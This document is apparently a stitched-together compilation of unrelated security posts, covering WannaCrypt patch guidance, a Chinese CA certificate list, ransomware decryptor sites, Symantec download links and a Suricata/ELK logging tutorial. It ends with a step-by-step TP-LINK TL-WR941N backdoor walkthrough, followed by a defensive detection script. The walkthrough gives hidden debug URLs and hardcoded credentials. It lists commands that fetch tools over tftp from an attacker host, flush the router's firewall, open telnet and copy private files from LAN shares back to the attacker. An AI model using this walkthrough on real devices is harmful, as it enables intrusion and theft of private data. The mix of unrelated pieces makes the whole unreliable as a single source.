Customer Guidance for WannaCrypt attacks

 

https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Microsoft solution available to protect additional products

Today many of our customers around the world and the critical systems they depend on were victims of malicious “WannaCrypt” software. Seeing businesses and individuals affected by cyberattacks, such as the ones reported today, was painful. Microsoft worked throughout the day to ensure we understood the attack and were taking all possible actions to protect our customers. This blog spells out the steps every individual and business should take to stay protected. Additionally, we are taking the highly unusual step of providing a security update for all customers to protect Windows platforms that are in custom support only, including Windows XP, Windows 8, and Windows Server 2003. Customers running Windows 10 were not targeted by the attack today.

Details are below.

  • In March, we released a security update which addresses the vulnerability that these attacks are exploiting. Those who have Windows Update enabled are protected against attacks on this vulnerability. For those organizations who have not yet applied the security update, we suggest you immediately deploy Microsoft Security Bulletin MS17-010.
  • For customers using Windows Defender, we released an update earlier today which detects this threat as Ransom:Win32/WannaCrypt. As an additional “defense-in-depth” measure, keep up-to-date anti-malware software installed on your machines. Customers running anti-malware software from any number of security companies can confirm with their provider that they are protected.
  • This attack type may evolve over time, so any additional defense-in-depth strategies will provide additional protections. (For example, to further protect against SMBv1 attacks, customers should consider blocking legacy protocols on their networks).

We also know that some of our customers are running versions of Windows that no longer receive mainstream support. That means those customers will not have received the above-mentioned Security Update released in March. Given the potential impact to customers and their businesses, we made the decision to make the Security Update for platforms in custom support only (Windows XP, Windows 8, and Windows Server 2003) broadly available for download (see links below).

Customers who are running supported versions of the operating system (Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8.1, Windows Server 2012, Windows 10, Windows Server 2012 R2, Windows Server 2016) will have received the security update MS17-010 in March. If customers have automatic updates enabled or have installed the update, they are protected. For other customers, we encourage them to install the update as soon as possible.

This decision was made based on an assessment of this situation, with the principle of protecting our customer ecosystem overall, firmly in mind.

Some of the observed attacks use common phishing tactics including malicious attachments. Customers should use vigilance when opening documents from untrusted or unknown sources. For Office 365 customers we are continually monitoring and updating to protect against these kinds of threats including Ransom:Win32/WannaCrypt. More information on the malware itself is available from the Microsoft Malware Protection Center on the Windows Security blog. For those new to the Microsoft Malware Protection Center, this is a technical discussion focused on providing the IT Security Professional with information to help further protect systems.

We are working with customers to provide additional assistance as this situation evolves, and will update this blog with details as appropriate.

Update 5/22/2017: Today, we released an update to the Microsoft Malicious Software Removal Tool (MSRT) to detect and remove WannaCrypt malware. For customers that run Windows Update, the tool will detect and remove WannaCrypt and other prevalent malware infections. Customers can also manually download and run the tool by following the guidance here. The MSRT tool runs on all supported Windows machines where automatic updates are enabled, including those that aren’t running other Microsoft security products.

Phillip Misner, Principal Security Group Manager, Microsoft Security Response Center

Further resources:

General information on ransomware

Protecting your PC from ransomware

MS17-010 security update

How to verify that MS17-010 is installed

Download English language security updates: Windows Server 2003 SP2 x64, Windows Server 2003 SP2 x86, Windows XP SP2 x64, Windows XP SP3 x86, Windows XP Embedded SP3 x86, Windows 8 x86, Windows 8 x64

Download localized language security updates: Windows Server 2003 SP2 x64, Windows Server 2003 SP2 x86, Windows XP SP2 x64, Windows XP SP3 x86, Windows XP Embedded SP3 x86, Windows 8 x86, Windows 8 x64

How to enable and disable SMB in Windows and Windows Server & GPO deployment

Guidance for Azure customers

Applying MS17-010 using Microsoft Intune

ConfigMgr SQL queries for reporting on KBs related to MS17-010

Guidance for Operations Management Suite customers

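List of certificates issued by the "Celestial Empire" (China)

Original post: https://plus.google.com/+GhostAssassin/posts/DmZca2RVdTS

CFCA Operation CA // China Financial Certification Authority, <http://www.cfca.com.cn>, brought in by certain online-banking plug-ins
CFCA Operation CA2
CFCA Policy CA
CFCA Root CA

China Trust Network // iTrus (Tianwei), http://www.itrus.com.cn/

CNNIC ROOT // no explanation needed

iTruschina CN Enterprise Individual Subscriber CA // iTrus (Tianwei)
iTruschina CN Root CA-1
iTruschina CN Root CA-2
iTruschina CN Root CA-3

UCA Root // Shanghai Digital Certificate Authority Center; this one has already passed WebTrust certification, http://www.sheca.com
UCA Global Root

ROOTCA // the Chinese government's cross root certificate; also brought in when installing software from domestic CAs; self-signed certificate, http://www.rootca.gov.cn/

WoSign Premium Server Authority // https://www.wosign.cn/
WoSign SGC Server Authority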

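No More Ransom! Helping you fight ransomware together

https://www.nomoreransom.org/

In recent years a steady stream of organizations has been hit by ransomware, among them government agencies, hospitals, schools and small and medium-sized businesses, and even many people's home computers have been infected. Generally speaking, ransomware is packaged inside software or e-mail attachments and disguised as another file format. Once the user inadvertently runs it, it deploys itself on the computer and eventually encrypts all files so that they can no longer be accessed, then displays a ransom demand to coerce the user into paying for the decryption key that restores the files. The use of Bitcoin makes the perpetrators even harder to trace.

Trend Micro's free recovery tool for ransomware, Trend Micro Ransomware File Decryptor, is effective against certain types of ransomware and can forcibly recover files without paying the ransom. The tool currently supports more than ten ransomware types, including TeslaCrypt, CryptXXX and SNSLocker. In addition, this article introduces the "No More Ransom" website, a ransomware-themed portal dedicated to fighting ransomware. The site has serious backing: it was built jointly by Intel Security, Interpol, the Dutch police and Kaspersky Lab! Its main purpose is to help users fight the threat by providing a variety of decryption tools, so that users can recover important documents and files without paying the ransom.

Rather than calling No More Ransom a website that provides decryption tools, it is more accurate to call it an educational site that teaches users how to avoid falling victim to ransomware. The content is concise and clear at a glance, for example: back up your data, only open e-mail attachments from contacts you know and trust, install antivirus software, and keep the software on your computer up to date. These are familiar pieces of advice, but keeping them in mind never hurts.

No More Ransom also provides an online ransomware detection platform. Users only need to upload their encrypted files, and it will look for a way to unlock them among the 160,000 decryption keys the organization holds, and will let you download a suitable recovery tool for free. Next, I will briefly describe how to use the No More Ransom website!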

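How to use it

STEP 1

After opening the No More Ransom! website, the home page directly asks whether you want help unlocking and recovering your files or documents without paying a ransom to the hackers. Clicking YES takes you to the detection platform; clicking No shows a series of protection and security information for users to study, although at the moment it is available only in English.

STEP 2

No More Ransom!'s Crypto Sheriff self-service detection platform for encrypted files is quite impressive, and may be the only site on the internet currently offering this service! Put simply, the user clicks the two buttons on the left to select and upload any two encrypted files, and on the right fills in the e-mail address and URL seen on the ransom payment page. This part needs to be accurate, to avoid failing to find a matching decryption key or tool. You can also directly upload the message left behind by the ransomware (.txt or .html format).

Finally, click the button at the bottom, and No More Ransom! will find keys that may be able to decrypt and recover the files for you to download for free, or free tools that may be able to restore them.

STEP 3

The Decryption Tools page of the site provides a series of tools that can help handle, restore or rescue files encrypted by ransomware (CoinVault, RannohDecryptor, RakhniDecryptor, ShadeDecryptor), each with its own corresponding ransomware file extensions that it can handle.

Before downloading, however, be sure to read the instructions first, and in particular make sure the ransomware has been completely removed from your system, so that files are not re-encrypted after decryption and damaged as a result. Any trustworthy antivirus software can do this.

There is currently a large amount of ransomware, and it keeps mutating and appearing in more forms; at this stage the cracking tools cannot cover all ransomware. However, the No More Ransom! website reminds users: try not to pay the ransom to these malware authors. First, you would lead them to believe there is money to be made, so they will find more ways to break into other users' computers; second, the decryption key obtained by paying the ransom may not work, and you fall into a scam! If you are unfortunate enough to be hit by ransomware, remember to look for a solution on the No More Ransom website first.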

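TeslaCrypt ransomware authors suddenly apologize and release the master decryption key

The TeslaCrypt ransomware has been upgraded continuously since it broke out last year, and the current TeslaCrypt 3.0 version has become increasingly difficult to crack. More and more users, once infected, find their files locked and can only unlock them by paying a fee. Recently, however, events took a dramatic turn: the ransomware's author team suddenly had a change of heart, announced that they would stop developing the malware, apologized on their web page and published the master decryption key.

Apart from the brief apology and the release of the master key, the author team gave no further explanation.
After the master decryption key was published, many security teams immediately released free TeslaCrypt unlocking tools, which in theory can unlock files encrypted by every version of the TeslaCrypt ransomware. Below is the download for the free unlocking tool made by the ESET security team.

ESET TeslaCrypt free unlocking tool

Reposted from http://www.cnbeta.com/articles/503133.htm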

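Symantec Endpoint Protection

Regarding the problem of downloading Symantec Endpoint Protection, a simple solution: open the following three websites in order and keep them open!

http://www.symantec.com/zh/cn/index.jsp
http://www.symantec.com/zh/cn/norton/index.jsp
https://www4.symantec.com/Vrt/offer?a_id=48182

Then return to this post and click the download links below to download the latest official SEP 12.1.6 MP3 release:

Simplified Chinese version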

http://esdownload.symantec.com/akdlm/CD/MTV/Symantec_Endpoint_Protection_12.1.6_MP3_Full_Installation_CS.exe
http://esdownload.symantec.com/akdlm/CD/MTV/Symantec_Endpoint_Protection_12.1.6_MP3_SEPM_CS.exe
http://esdownload.symantec.com/akdlm/CD/MTV/Symantec_Endpoint_Protection_12.1.6_MP3_All_Clients_CS.zip

Traditional Chinese version

http://esdownload.symantec.com/akdlm/CD/MTV/Symantec_Endpoint_Protection_12.1.6_MP3_Full_Installation_CH.exe
http://esdownload.symantec.com/akdlm/CD/MTV/Symantec_Endpoint_Protection_12.1.6_MP3_SEPM_CH.exe
http://esdownload.symantec.com/akdlm/CD/MTV/Symantec_Endpoint_Protection_12.1.6_MP3_All_Clients_CH.zip

English version

http://esdownload.symantec.com/akdlm/CD/MTV/Symantec_Endpoint_Protection_12.1.6_MP3_Full_Installation_EN.exe
http://esdownload.symantec.com/akdlm/CD/MTV/Symantec_Endpoint_Protection_12.1.6_MP3_SEPM_EN.exe
http://esdownload.symantec.com/akdlm/CD/MTV/Symantec_Endpoint_Protection_12.1.6_MP3_All_Clients_EN.zip

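For personal use, download Symantec_Endpoint_Protection_12.1.6_MP3_All_Clients, that is, the unmanaged client, which is in effect completely free!
To put it plainly: the first and second are managed packages and must be paid for. The third, the unmanaged client, is in effect completely free for individuals!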

Logstash Kibana and Suricata JSON output

https://redmine.openinfosecfoundation.org/projects/suricata/wiki/_logstash_kibana_and_suricata_json_output

 

With the release of Suricata 2.0rc1, Suricata introduces all-JSON output capability.
What is JSON – http://en.wikipedia.org/wiki/JSON

One easy way to handle Suricata’s JSON log output is through Kibana – http://kibana.org/ :

Kibana is a highly scalable interface for Logstash (http://logstash.net/) and ElasticSearch (http://www.elasticsearch.org/) that allows you to efficiently search, graph, analyze and otherwise make sense of a mountain of logs.

The installation is a very simple, basic set-up with minor specifics for Ubuntu. You can be up and running, looking through the logs, in under 5 min.
The downloads can be found here – http://www.elasticsearch.org/overview/elkdownloads/

This is what you need to do.

Suricata

Make sure your Suricata is compiled/installed with libjansson support enabled:

$ suricata --build-info
This is Suricata version 2.0 RELEASE
Features: NFQ PCAP_SET_BUFF LIBPCAP_VERSION_MAJOR=1 AF_PACKET HAVE_PACKET_FANOUT LIBCAP_NG LIBNET1.1 HAVE_HTP_URI_NORMALIZE_HOOK HAVE_NSS HAVE_LIBJANSSON 
...
  libnss support:                          yes
  libnspr support:                         yes
  libjansson support:                     --> yes <--
  Prelude support:                         no
  PCRE jit:                                no
  libluajit:                               no
  libgeoip:                                yes
  Non-bundled htp:                         yes
  Old barnyard2 support:                   no
  CUDA enabled:                            no
...

If it isn’t, check out the Suricata_installation page to install or compile Suricata for your distribution.
NOTE: you will need these packages installed before compilation -> libjansson4 and libjansson-dev.

Configure suricata

In your suricata.yaml

  # "United" event log in JSON format
  - eve-log:
      enabled: yes
      type: file #file|syslog|unix_dgram|unix_stream
      filename: eve.json
      # the following are valid when type: syslog above
      #identity: "suricata" 
      #facility: local5
      #level: Info ## possible levels: Emergency, Alert, Critical,
                   ## Error, Warning, Notice, Info, Debug
      types:
        - alert
        - http:
            extended: yes     # enable this for extended logging information
        - dns
        - tls:
            extended: yes     # enable this for extended logging information
        - files:
            force-magic: yes   # force logging magic on all logged files
            force-md5: yes     # force logging of md5 checksums
        #- drop
        - ssh
        - smtp
        - flow

Install ELK (elasticsearch, logstash, kibana)

First install the dependencies.
(NOTE: ELK recommends running with Oracle Java – how to -> http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/setup-service.html#_installing_the_oracle_jdk)

Otherwise you can install the openjdk:

apt-get install apache2 openjdk-7-jdk openjdk-7-jre-headless

Then download and install the software.

Make sure you download the latest versions –
http://www.elasticsearch.org/overview/elkdownloads/
The installation process is simple (for example):

wget https://download.elasticsearch.org/kibana/kibana/kibana-3.0.0.tar.gz
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-1.6.1.deb
wget https://download.elastic.co/logstash/logstash/packages/debian/logstash_1.5.3-1_all.deb

tar -C /var/www/ -xzf kibana-3.0.0.tar.gz
dpkg -i elasticsearch-1.6.1.deb
dpkg -i logstash_1.5.3-1_all.deb

Logstash configuration

Create and save a logstash.conf file with the following content in the /etc/logstash/conf.d/ directory:

touch /etc/logstash/conf.d/logstash.conf

Insert the following (make sure the directory path is correct):

input {
  file { 
    path => ["/var/log/suricata/eve.json"]
    sincedb_path => ["/var/lib/logstash/"]
    codec =>   json 
    type => "SuricataIDPS" 
  }

}

filter {
  if [type] == "SuricataIDPS" {
    date {
      match => [ "timestamp", "ISO8601" ]
    }
    ruby {
      code => "if event['event_type'] == 'fileinfo'; event['fileinfo']['type']=event['fileinfo']['magic'].to_s.split(',')[0]; end;" 
    }
  }

  if [src_ip]  {
    geoip {
      source => "src_ip" 
      target => "geoip" 
      #database => "/opt/logstash/vendor/geoip/GeoLiteCity.dat" 
      add_field => [ "[geoip][coordinates]", "%{[geoip][longitude]}" ]
      add_field => [ "[geoip][coordinates]", "%{[geoip][latitude]}"  ]
    }
    mutate {
      convert => [ "[geoip][coordinates]", "float" ]
    }
    if ![geoip.ip] {
      if [dest_ip]  {
        geoip {
          source => "dest_ip" 
          target => "geoip" 
          #database => "/opt/logstash/vendor/geoip/GeoLiteCity.dat" 
          add_field => [ "[geoip][coordinates]", "%{[geoip][longitude]}" ]
          add_field => [ "[geoip][coordinates]", "%{[geoip][latitude]}"  ]
        }
        mutate {
          convert => [ "[geoip][coordinates]", "float" ]
        }
      }
    }
  }
}

output { 
  elasticsearch {
    host => localhost
    #protocol => http
  }
}
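
What the filter block above does to each event, as an added Python example that is not part of the original wiki page: it parses the Suricata timestamp, derives fileinfo.type from the first comma-separated part of fileinfo.magic, and picks which address to geolocate. The sample events, the `@timestamp` and `geo_field` output names, and the use of "publicly routable" as a stand-in for "the GeoIP lookup returns a result" are assumptions.

```python
import ipaddress
import json
from datetime import datetime, timezone

# Constructed sample eve.json lines (not captured traffic); the last one is cut off
# the way a line looks when it is read while Suricata is still writing it.
SAMPLE_EVE = r'''
{"timestamp":"2014-04-01T10:15:02.123456+0200","event_type":"fileinfo","src_ip":"192.168.1.10","dest_ip":"8.8.8.8","fileinfo":{"filename":"/a.exe","magic":"PE32 executable (GUI) Intel 80386, for MS Windows","md5":"00000000000000000000000000000000"}}
{"timestamp":"2014-04-01T10:15:03.000001+0200","event_type":"http","src_ip":"8.8.4.4","dest_ip":"192.168.1.10","http":{"hostname":"example.test","url":"/"}}
{"timestamp":"2014-04-01T10:15:04.5000
'''

def parse_ts(value):
    # Suricata writes the UTC offset without a colon (+0200); %z accepts that form.
    ts = datetime.strptime(value, "%Y-%m-%dT%H:%M:%S.%f%z")
    return ts.astimezone(timezone.utc)

def geo_source(event):
    # Same order as the filter: src_ip first, dest_ip only when src_ip gives nothing.
    # Assumption: a publicly routable address stands in for a successful GeoIP lookup.
    for field in ("src_ip", "dest_ip"):
        try:
            if ipaddress.ip_address(event.get(field, "")).is_global:
                return field
        except ValueError:
            continue
    return None

def normalize(line):
    """Return the enriched event, or None for a line that cannot be used."""
    try:
        event = json.loads(line)
        stamp = parse_ts(event["timestamp"])
    except (ValueError, KeyError, TypeError):
        return None
    event["@timestamp"] = stamp.isoformat()
    if event.get("event_type") == "fileinfo":
        info = event.setdefault("fileinfo", {})
        # Equivalent of magic.to_s.split(',')[0]; a missing magic yields None.
        info["type"] = str(info.get("magic") or "").split(",")[0] or None
    event["geo_field"] = geo_source(event)
    return event

def load(text):
    events, skipped = [], 0
    for line in text.splitlines():
        if not line.strip():
            continue
        event = normalize(line)
        if event is None:
            skipped += 1
        else:
            events.append(event)
    return events, skipped

if __name__ == "__main__":
    parsed, bad = load(SAMPLE_EVE)
    for ev in parsed:
        print(ev["@timestamp"], ev["event_type"], ev["geo_field"], ev.get("fileinfo", {}).get("type"))
    print("skipped lines:", bad)
```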

Configure the start-up services

update-rc.d elasticsearch defaults 95 10
update-rc.d logstash defaults

service apache2 restart
service elasticsearch start
service logstash start

Enjoy

That’s all. Now make sure Suricata is running and logs are being written to your JSON log files, then point your browser to ->

http://localhost/kibana-3.0.0

NOTE:
Some ready to use templates – Templates for Kibana/Logstash to use with Suricata IDPS

From here on, if you would like to customize and familiarize yourself more with the interface, you should read the documentation about Kibana and Logstash.
Please keep in mind that this is a very quick (under 5 min) tutorial. You should customize it and review the proper way for you to run it as a service, and/or consider using an HTTPS web interface and a reverse proxy with some authentication.

Some possible customization of the output of Logstash and Kibana – >

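TP-LINK router backdoor

Recently, after the "TP-LINK vulnerability-gate" incident was disclosed by CNVD (China National Vulnerability Database), it attracted a great deal of public attention. Because TP-LINK's market share reaches 70%, many internet users are worried about whether their information has been leaked.

According to a veteran hacker, the TP-LINK router backdoor vulnerability is far more dangerous than what has been disclosed so far. He explained that attacking a vulnerable TP-LINK router does not require a local connection to the router; the router can be entered remotely, which makes it possible to monitor all of a user's online activity and to steal local information. In other words, once a user's TP-LINK router is under control, the user's online activity can be monitored and any information can be taken from the user's computer at will, whether private information or important documents, and the user has no idea it is happening.

He gave a demonstration, using the backdoor vulnerability in TP-LINK to easily monitor a user's online activity: what the user chatted about in QQ and what the user bought on Taobao were all plain for him to see, and in his eyes the user was completely transparent. He could also use the TP-LINK vulnerability to get into the user's computer: whether wedding photos taken in Europe or private photos taken at home with a partner, he could steal them whenever he wanted, leaving no privacy at all.

He also said that the TP-LINK backdoor vulnerability has existed for many years and has never been taken seriously by TP-LINK, while TP-LINK's market share is above 70%. So many privacy leaks are related to TP-LINK; otherwise how could hackers obtain users' private photos and bank account numbers? Many of these were done using TP-LINK vulnerabilities, and users simply do not know it. Users of Mercury and Fast routers in China cannot escape either, because Mercury and Fast are both TP-LINK under other names; once a vulnerability in a TP-LINK router is found, the computers of Mercury and Fast router users can be entered at will. As things stand, most TP-LINK routers have problems, and guaranteeing absolute security is almost impossible.

The following is a demonstration of a hacker using the TP-LINK router backdoor vulnerability to steal user information: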

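I. Environment topology

Figure 1: Environment topology

Topology notes:

1. PC2 uses a public IP address, or is a DMZ device behind a router connected to the public network;

2. The TP-Link device has remote web access enabled; 8011 in the example is the remote web access port;

3. PC2 must run a TFTP server;

4. TP-Link device model: TL-WR941N; for photos of the device see the appendix.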

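II. Procedure

1. With the TP-Link device online, enable remote web access, as in Figures 2 and 3.

Figure 2

Figure 3

2. With PC2 online, enter http://xxx.xxx.xxx.xxx:8011/userRpmNatDebugRpm26525557/start_art.html in the address bar (xxx.xxx.xxx.xxx is the WAN IP of the TP-Link device, 8011 is the remote web access port) and wait about 1 minute for the following page to appear, as shown in Figure 4.

Figure 4

3. On PC2, enter http://xxx.xxx.xxx.xxx:8011/userRpmNatDebugRpm26525557/linux_cmdline.html in the address bar. The TP-LINK device login page appears; enter the device management username and password (username: admin, password: admin) to reach the following page (as shown in Figure 5). The username this page requires is osteam and the password is 5up. On this page we have free rein. Next we use the vulnerability to access shares on the TP-Link LAN.

Figure 5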

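4. Start the TFTP server on PC2 and place the files busybox/libbigballofmud.so/smbclient/smbtree in the TFTP server path (these files will later be transferred via tftp into the /tmp directory of the TP-Link device). In the command field of the device page, enter tftp -g -r busybox aaa.aaa.aaa.aaa (aaa.aaa.aaa.aaa is the public IP address of PC2). The following page appears (Figure 6).

Figure 6

5. After the transfer completes, enter ls -l in the command field; busybox is now present in the directory, as in Figure 7.

Figure 7

6. Enter chmod 777 busybox in the command field, then enter ls -l; the permissions of busybox have changed to 777, as in Figure 8.

Figure 8

7. Enter iptables -P INPUT ACCEPT/iptables -P FORWARD ACCEPT/iptables -F in the command field, as in Figure 9. These commands change the firewall's filtering rules; after this, the device's firewall exists in name only.

Figure 9

8. Enter ./busybox telnetd in the command field to start remote telnet, as in Figure 10. From here on we can telnet to the device and no longer depend on the web page.

Figure 10

9. Telnet to the TP-Link device; the username here is root and the password is 5up. As in Figure 11, I have successfully telnetted into the TP-Link back end, and we are now halfway there.

Figure 11

10. In the telnet window enter cd /tmp, and after entering that directory enter, one after another, tftp -g -r libbigballofmud.so aaa.aaa.aaa.aaa/tftp -g -r smbclient aaa.aaa.aaa.aaa/tftp -g -r smbtree aaa.aaa.aaa.aaa (these commands transfer libbigballofmud.so/smbtree/smbclient via TFTP into the /tmp directory of the TP-Link device, so make sure the TFTP server on PC2 is running). As shown in Figure 12, the transfer succeeded.

Figure 12

11. In the telnet session enter the following commands (as shown in Figure 13):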

  mount tmpfs /usr -t tmpfs

  /tmp/busybox mkdir -p /usr/lib

  /tmp/busybox cp /tmp/*so* /usr/lib/ -fr

  /tmp/busybox ln -s /usr/lib/libbigballofmud.so /usr/lib/libbigballofmud.so.0

  chmod 777 smbtree

  chmod 777 smbclient

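Figure 13

12. Run ./smbtree in the /tmp directory to find the shared file information on the LAN, Figure 14.

Figure 14

13. Run ./smbclient //bbbb/bbbbbb (//bbbb/bbbbbb is one of the shared directories found in Figure 14) with an empty password; after entering the folder, run ls to display the contents of the folder, as in Figure 15.

Figure 15

14. By walking the directories, the file information in every directory can be listed, for example /mnt/files/cherryblossoms1.jpg, as shown in Figure 16. Next we look at what kind of picture cherryblossoms1.jpg is.

Figure 16

15. Copy the shared file into the /tmp directory on the TP-Link device by running the command get ccc (ccc is the shared file to copy, such as cherryblossoms1.jpg in Figure 17).

Figure 17

16. Copy the file to the local device via tftp by running the command /tmp/busybox tftp -p -l ccc aaa.aaa.aaa.aaa, as shown in Figure 18.

Figure 18

17. Open the copied file in the tftp directory on the local device, as in Figures 19 and 20.

Figure 19

Figure 20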

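Notes:

1. The TP-Link device must have remote web access enabled; 8011 in the example is the remote web access port.

2. The local device should preferably use a public IP address, or be a DMZ device behind a router connected to the public network.

3. The local device must run a TFTP server.

4. busybox/libbigballofmud.so/smbclient/smbtree must be copied into the /tmp directory on the TP-Link device.

5. In the example, xxx.xxx.xxx.xxx is the WAN IP of the TP-Link device, aaa.aaa.aaa.aaa is the public IP of PC2, //bbbb/bbbbbb is one of the shared directories found, and ccc is a shared file in that directory.

6. The tools needed are: tftpd32.exe, busybox, libbigballofmud.so, smbclient, smbtree.

Appendix: photos of the TL-WR941N

Figure 21

Figure 22

Figure 23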
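
From the defender's side, requests to the debug pages named in the steps above stand out in HTTP logs. The following added example (not part of the original article) scans Suricata eve.json `http` events for the `/userRpmNatDebugRpm26525557/` path after decoding and normalising the URL; the sample events and addresses are constructed, and matching case-insensitively is an assumption made to catch variants.

```python
import json
import posixpath
from urllib.parse import unquote

# Debug path prefix quoted in the walkthrough above, lower-cased for comparison.
DEBUG_PREFIX = "/userrpmnatdebugrpm26525557/"

# Constructed eve.json events (documentation addresses, not real traffic).
SAMPLE = r'''
{"timestamp":"2013-03-15T09:00:01.000000+0800","event_type":"http","src_ip":"198.51.100.7","dest_ip":"203.0.113.20","dest_port":8011,"http":{"url":"/userRpmNatDebugRpm26525557/start_art.html"}}
{"timestamp":"2013-03-15T09:01:10.000000+0800","event_type":"http","src_ip":"198.51.100.7","dest_ip":"203.0.113.20","dest_port":8011,"http":{"url":"/userRpm/%2e%2e/userRpmNatDebugRpm26525557//linux_cmdline.html?x=1"}}
{"timestamp":"2013-03-15T09:02:00.000000+0800","event_type":"http","src_ip":"192.168.1.100","dest_ip":"192.168.1.1","dest_port":80,"http":{"url":"/userRpm/StatusRpm.htm"}}
{"timestamp":"2013-03-15T09:02:05.000000+0800","event_type":"dns","src_ip":"192.168.1.100","dest_ip":"192.168.1.1"}
'''

def canonical_path(url):
    """Decode and normalise a request URL so encoded or padded variants still match."""
    path = url.split("?", 1)[0].split("#", 1)[0]
    for _ in range(2):  # undo up to two layers of percent-encoding
        path = unquote(path)
    path = "/" + path.replace("\\", "/").lstrip("/")
    # normpath collapses "//" and resolves "." and ".." segments
    return posixpath.normpath(path).lower()

def find_debug_requests(lines):
    """Return (src_ip, dest_ip, dest_port, path) for each request to the debug pages."""
    hits = []
    for line in lines:
        try:
            event = json.loads(line)
        except ValueError:
            continue  # blank or truncated line
        if not isinstance(event, dict) or event.get("event_type") != "http":
            continue
        url = (event.get("http") or {}).get("url") or ""
        path = canonical_path(url)
        # Appending "/" also catches a request for the bare directory name.
        if DEBUG_PREFIX in path + "/":
            hits.append((event.get("src_ip"), event.get("dest_ip"),
                         event.get("dest_port"), path))
    return hits

if __name__ == "__main__":
    for hit in find_debug_requests(SAMPLE.splitlines()):
        print("debug page request:", hit)
```

Any hit for this path arriving on a router's remote web access port is worth investigating, and disabling remote web access removes the exposure the walkthrough depends on.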